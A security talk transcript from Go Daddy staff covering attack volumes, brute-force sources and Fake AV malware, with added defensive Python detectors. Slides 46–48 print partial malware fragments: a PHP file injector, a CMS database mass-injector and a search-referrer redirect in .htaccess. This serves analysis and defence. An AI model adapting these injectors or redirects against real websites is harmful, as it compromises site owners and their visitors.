Ganesh Devarajan & Todd Redfoot. Introduction: Todd Redfoot, Chief Information Security Officer; Ganesh Devarajan, Sr. Security Architect.

Presentation transcript:

1 Ganesh Devarajan & Todd Redfoot

2 Introduction
  - Todd Redfoot, Chief Information Security Officer
  - Ganesh Devarajan, Sr. Security Architect

3 The Background (What does Go Daddy do?)

4

5 What does Go Daddy do?
  - 9.4 Million Customers
  - 48 Million Domains Under Management
  - Over 5 million Active Hosting Accounts
  - 1/3 of all DNS queries run through our servers
  - We register, renew or transfer more than one domain name every second

6 What does Go Daddy do?
  - 40+ Security Professionals in Team
  - 24 x 7 Operations Center
  - Research
  - Engineering
  - Forensics
  - Customer Security Advisors
  - Penetration Testing
  - User Administration
  - Development

7

8 The Numbers (What does Go Daddy see?)

9 What do we see?
  - Monitor over 100,000 events per second
  - 8.6 Billion/Day
  - DDoS - ~900 Attacks per day / 6K per week
  - Feb Largest 21M pps
  - Last Week – 40G Attack
  - Brute Force – 3.5M per hour

10 What do we see?
  - “Other” Attacks, all in a 24 hour period:
  - 425K – Invalid Directory Traversal
  - 90K – XSS Prevention
  - 115K – SQL Injection Prevention

11 Current Trends

12 SSH Brute Forcers

13 Englewood, Colorado 140 Million attempts

14 MS-SQL Brute Forcers

15 Orlando, FL 348 Million attempts

16 My-SQL Brute Forcers

17

18 FTP Brute Forcers

19 XingPing, CN 12 Million attempts

20 Brute Forcers - All

21 Brute Forcers - US Garden City, NY 75.7 Million attempts

22 Brute Forcers - CN Datong, CN 22.5 Million attempts

23 Brute Forcinator
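A defender-side counterpart to the brute-force figures on the preceding slides, added here as an example that is not part of the presentation or of Go Daddy's tooling: a sliding-window detector run over constructed OpenSSH auth-log lines. The log lines, the addresses (RFC 5737 documentation ranges), the threshold and window values and the assumed log year are all my own choices.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed OpenSSH auth.log lines (not from the presentation). Addresses are
# taken from the RFC 5737 documentation ranges.
SAMPLE_LOG = """\
Jun  3 10:00:01 web1 sshd[2201]: Failed password for invalid user admin from 198.51.100.7 port 50122 ssh2
Jun  3 10:00:02 web1 sshd[2203]: Failed password for root from 198.51.100.7 port 50123 ssh2
Jun  3 10:00:02 web1 sshd[2205]: Failed password for invalid user oracle from 198.51.100.7 port 50124 ssh2
Jun  3 10:00:03 web1 sshd[2207]: Failed password for invalid user test from 198.51.100.7 port 50125 ssh2
Jun  3 10:00:04 web1 sshd[2209]: Failed password for root from 198.51.100.7 port 50126 ssh2
Jun  3 10:00:05 web1 sshd[2211]: Failed password for invalid user guest from 198.51.100.7 port 50127 ssh2
Jun  3 10:00:30 web1 sshd[2213]: Failed password for alice from 203.0.113.9 port 40001 ssh2
Jun  3 10:00:45 web1 sshd[2215]: Accepted password for alice from 203.0.113.9 port 40002 ssh2
Jun  3 10:20:00 web1 sshd[2217]: Failed password for bob from 192.0.2.5 port 41000 ssh2
Jun  3 10:35:00 web1 sshd[2219]: Failed password for bob from 192.0.2.5 port 41001 ssh2
Jun  3 10:50:00 web1 sshd[2221]: Failed password for bob from 192.0.2.5 port 41002 ssh2
"""

FAILED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port"
)


def parse_failures(text, year=2011):
    """Yield (timestamp, user, ip) for each failed-login line.

    syslog lines carry no year, so one is assumed (2011 is an assumption);
    accepted logins and unrelated lines are ignored.
    """
    for line in text.splitlines():
        m = FAILED_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        yield ts, m["user"], m["ip"]


def detect_brute_force(text, threshold=5, window_seconds=60):
    """Flag source IPs that produce >= threshold failures inside any window.

    Returns {ip: {"failures": total, "users": [distinct usernames]}} for flagged
    sources. The user list is kept because many distinct names from one source
    (password spraying) is a stronger signal than repeats on a single account.
    """
    recent = defaultdict(deque)   # ip -> timestamps still inside the window
    total = defaultdict(int)
    users = defaultdict(set)
    flagged = set()
    for ts, user, ip in sorted(parse_failures(text)):
        window = recent[ip]
        window.append(ts)
        while (ts - window[0]).total_seconds() > window_seconds:
            window.popleft()
        total[ip] += 1
        users[ip].add(user)
        if len(window) >= threshold:
            flagged.add(ip)
    return {ip: {"failures": total[ip], "users": sorted(users[ip])}
            for ip in sorted(flagged)}


if __name__ == "__main__":
    for ip, info in detect_brute_force(SAMPLE_LOG).items():
        print(f"{ip}: {info['failures']} failures, users={info['users']}")
```

With the defaults only 198.51.100.7 is flagged; 192.0.2.5 spreads three attempts over half an hour and is caught only with a much longer window, which is the usual trade-off between catching low-and-slow sources and alerting on ordinary typos. At the volumes on slide 9 the per-source counters would live in a central stream processor rather than on each host.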

24 SQL Injection

25 Seattle, WA 1.3 Million attempts

26 Backdoor Shells

27 Phone Company (91%) Mountain View, CA

28 PHP Attacks

29 Berlin, Germany 1.9 Million attempts

30 PHP Attacks Montreal, CA 1.1 Million attempts

31 Botnet

32

33 Source - https://zeustracker.abuse.ch/

34 Botnet Source -

35 Phishing

36 The Good, Bad and Ugly?

37 The Bad – Most Events

38 The Ugly – Security Events & DDoS

39 New Trends

40 Recent Changes
  - “Hacktivists”
  - Lulzsec = Twitter
  - ComodoHacker = Pastebin
  - Phishing -> Spear Phishing
  - Targeted & Coordinated Attacks
  - RSA / Lockheed Martin Connection

41 What’s in the News?

42 More of the same…
  - More Client-side Exploits
  - Browser exploits
  - Adobe exploits
  - Web Server Compromises
  - Brute Force Attacks
  - Leveraging Web Application Vulnerabilities
  - Config files with passwords

43 Fake AV
  - Scareware
  - Reports fake viruses to users
  - Asks for fee to remove the threat
  - Paying does nothing but give them your CC#
  - $10 Million in Revenue last year

44 Fake AV Analysis

45 Fake AV – Attack Breakdown
  Registrant: Hilary Kneber fax: /2 Sun street. Montey 29 Virginia NA 3947

46 Fake AV – Sample Shell

  $z=$_SERVER["DOCUMENT_ROOT"];
  $encoded='
  $val=$z;
  $totalinjected=0;
  echo "Working with $val\n!!STARTING!!";
  ob_flush();
  $start_time=microtime(true);
  if ($val!="") do_folder($val);
  $end_time=microtime(true)-$start_time;
  echo "|Injected| $totalinjected files in $end_time seconds\n";

47 Fake AV – DB Variant

  …
  $insert=' ';
  ...
  $link=mysql_connect($host,$user,$pass);
  if (!$link) {
      die('Could not connect: '. mysql_error());
  } else {
      echo 'Connected successfully'."\n";
      $db_list = mysql_list_dbs($link);
      $bases = array();
      while ($row = mysql_fetch_object($db_list)) {
          $bases[]=$row->Database;
      }
  …
  //wordpress
  if (last_is($table,"_posts")){
      $query="UPDATE `".$bases[$i]."`.`$table` SET `post_content` = concat(`post_content`,'$insert')";
  }
  //joomla
  if (last_is($table,"_content")){
      $query="UPDATE `".$bases[$i]."`.`$table` SET `introtext` = concat(`introtext`,'$insert')";
  }
  //drupal
  if (last_is($table,"node_revisions")){
      $query="UPDATE `".$bases[$i]."`.`$table` SET `body` = concat(`body`,'$insert'), format=2";
  }
  if (last_is($table,"_post")){
      $query="UPDATE `".$bases[$i]."`.`$table` SET `title` = concat(`title`,'$insert')";
  }

48 Fake AV - Search Redirect

  RewriteEngine On
  RewriteOptions inherit
  RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
  RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
  RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
  RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
  RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
  RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
  RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
  RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
  RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
  RewriteRule .* [R,L]
  AddHandler x-httpd-php-cgi .php4
  AddHandler x-httpd-php5-cgi .php5
  AddHandler x-httpd-php5-cgi .php
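Added example, not code from the presentation: signature checks for the two artifacts on slides 47 and 48, the referrer-conditional search-engine redirect in .htaccess (visitors arriving from a search result are sent elsewhere while the site owner, who types the URL, sees nothing wrong) and the markers of the database mass-injector in PHP source. The sample files are constructed, the redirect target elided on the slide is replaced by a placeholder host, and the marker names and the two-marker rule are my own.

```python
import re

# Constructed .htaccess in the shape shown on slide 48 (not the slide's own file).
# The redirect target was elided on the slide; a placeholder host stands in for it.
SAMPLE_HTACCESS = """\
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* http://REDIRECT-TARGET-PLACEHOLDER.example/ [R,L]
AddHandler x-httpd-php5-cgi .php
"""

# Constructed benign rewrite rules (a typical front-controller setup).
SAMPLE_BENIGN_HTACCESS = """\
RewriteEngine On
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule ^(.*)$ index.php [L]
"""

# Fragments carrying the slide-47 markers (constructed, not a working script).
SAMPLE_PHP = r"""<?php
$z = $_SERVER["DOCUMENT_ROOT"];
$db_list = mysql_list_dbs($link);
$query = "UPDATE `".$bases[$i]."`.`$table` SET `post_content` = concat(`post_content`,'$insert')";
"""

SAMPLE_BENIGN_PHP = r"""<?php
$root = $_SERVER["DOCUMENT_ROOT"];
require $root . "/config.php";
"""

SEARCH_ENGINES = ("ask.com", "google", "msn.com", "bing.com", "live.com",
                  "aol.com", "altavista", "excite", "yahoo")

REWRITE_COND_REFERER = re.compile(r"\s*RewriteCond\s+%\{HTTP_REFERER\}", re.I)
REWRITE_RULE_REDIRECT = re.compile(r"\s*RewriteRule\b.*\[[^\]]*\bR\b", re.I)
ADD_HANDLER_PHP = re.compile(r"\s*AddHandler\s+(\S+)\s+.*\.php\d?\b", re.I)


def htaccess_findings(text):
    """Findings for one .htaccess body, as (name, detail) tuples.

    'search-referrer-redirect': two or more RewriteCond lines keyed on
    search-engine referrers combined with an external redirect (R flag).
    'php-handler-override': AddHandler mapping PHP extensions to another handler.
    """
    lines = text.splitlines()
    engines = {e for l in lines if REWRITE_COND_REFERER.match(l)
               for e in SEARCH_ENGINES if e in l.lower()}
    redirects = any(REWRITE_RULE_REDIRECT.match(l) for l in lines)
    findings = []
    if len(engines) >= 2 and redirects:
        findings.append(("search-referrer-redirect", sorted(engines)))
    for l in lines:
        m = ADD_HANDLER_PHP.match(l)
        if m:
            findings.append(("php-handler-override", m.group(1)))
    return findings


PHP_MARKERS = {
    "walks-document-root": re.compile(r"\$_SERVER\s*\[\s*['\"]DOCUMENT_ROOT['\"]\s*\]"),
    "enumerates-all-databases": re.compile(r"\bmysql_list_dbs\s*\(", re.I),
    "appends-to-cms-content": re.compile(
        r"UPDATE\s.*?SET\s+`?(post_content|introtext|body|title)`?\s*=\s*concat\(",
        re.I | re.S),
}


def php_findings(text):
    """Names of the slide-47 markers present in a PHP source body, sorted."""
    return sorted(name for name, rx in PHP_MARKERS.items() if rx.search(text))


def php_is_suspicious(text, minimum=2):
    """DOCUMENT_ROOT alone is common in legitimate code, so require two markers."""
    return len(php_findings(text)) >= minimum


if __name__ == "__main__":
    print(htaccess_findings(SAMPLE_HTACCESS))
    print(php_findings(SAMPLE_PHP), php_is_suspicious(SAMPLE_PHP))
```

On a hosting fleet these checks would run over every customer .htaccess and PHP file on a schedule; the referrer rule in particular is worth alerting on even without a known redirect target, since legitimate sites have little reason to treat search-engine visitors differently from everyone else.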

49 Custom Monitoring

50 UDP Flooder

51 How to Protect?

52 Website Vulnerability Scanners
  - Website Protection - Site Scanner ($48/Year)
  - Beyond Security ($99.95/Year)
  - McAfee Secure (TM) (~$2100/Year)
  - WhiteHat Security®
  - IBM AppScan®
  - Cenzic®
  - HP WebInspect®

53 Web Based Malware Detection
  - Virtual machine Honey pots
    - Monitor Creation of new Processes, File system or Registry entries, etc.
  - Browser Emulation
  - Reputation Service
    - Internet’s black list
  - Signature Based Detection/Prevention
    - Intrusion Detection System/Intrusion Prevention System
    - Anti-Virus
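Added example for the "monitor creation of new ... file system entries" item, not part of the presentation or of any product it lists: a file-system integrity baseline for a web root, which is what catches a shell like the one on slide 46 that walks DOCUMENT_ROOT and rewrites files. The directory layout, file contents and the simulated tampering are constructed.

```python
import hashlib
import os
import tempfile


def snapshot(root):
    """Map every file under root (relative, '/'-separated path) to its SHA-256."""
    digests = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            h = hashlib.sha256()
            with open(path, "rb") as fh:
                for chunk in iter(lambda: fh.read(65536), b""):
                    h.update(chunk)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            digests[rel] = h.hexdigest()
    return digests


def diff_snapshots(before, after):
    """Files added, removed, or changed between two snapshots (sorted lists)."""
    return {
        "added": sorted(set(after) - set(before)),
        "removed": sorted(set(before) - set(after)),
        "modified": sorted(p for p in before.keys() & after.keys()
                           if before[p] != after[p]),
    }


def write(root, rel, text, mode="w"):
    """Helper for the demo: write (or append) text to root/rel, creating dirs."""
    path = os.path.join(root, *rel.split("/"))
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, mode) as fh:
        fh.write(text)


def demo():
    """Constructed web root: baseline it, simulate tampering, return the diff.

    The tampering mirrors what the slide-46 shell does to a hosting account:
    existing PHP files get content appended and new files appear in the root.
    """
    with tempfile.TemporaryDirectory() as root:
        write(root, "index.php", "<?php echo 'hello'; ?>\n")
        write(root, "wp-content/themes/default/footer.php", "<?php wp_footer(); ?>\n")
        baseline = snapshot(root)
        # Simulated tampering (placeholder text, no real payload).
        write(root, "wp-content/themes/default/footer.php",
              "<!-- INJECTED-CONTENT-PLACEHOLDER -->\n", mode="a")
        write(root, ".htaccess", "RewriteEngine On\n")
        return diff_snapshots(baseline, snapshot(root))


if __name__ == "__main__":
    print(demo())
```

The baseline has to be stored and verified somewhere the web server's account cannot write, since anything that can modify the web root can also rewrite a baseline kept beside it; expected churn (caches, uploads) goes on an allow-list rather than being silently ignored.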

54 New Methodologies

55 Questions?

56 Thank You: Ganesh Devarajan, Todd Redfoot

